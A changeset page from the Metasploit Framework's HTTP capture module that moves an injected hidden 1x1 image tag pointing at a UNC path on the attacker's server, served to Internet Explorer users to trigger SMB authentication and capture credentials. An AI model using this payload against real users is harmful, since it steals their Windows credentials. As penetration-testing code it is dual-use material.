Changeset 5487

Show
Ignore:
Timestamp:
04/21/08 17:02:39 (4 weeks ago)
Author:
hdm
Message:

Place the UNC url last

Files:

Legend:

Unmodified
Added
Removed
Modified
Copied
Moved
  • framework3/trunk/modules/auxiliary/server/capture/http.rb

    r5486 r5487  
    254254                 
    255255                buff = '' 
    256                  
    257                 if(ua_name == "IE") 
    258                         buff << "<img src='\\\\#{mysrc}\\public#{Time.now.to_i.to_s}\\loading.jpg' width='1' height='1'>" 
    259                 end 
    260256 
    261257                list = File.readlines(@sitelist) 
     
    267263                end 
    268264 
     265                if(ua_name == "IE") 
     266                        buff << "<img src='\\\\#{mysrc}\\public#{Time.now.to_i.to_s}\\loading.jpg' width='1' height='1'>" 
     267                end 
     268                 
    269269                data = File.read(@template) 
    270270                data.gsub!(/%CONTENT%/, buff)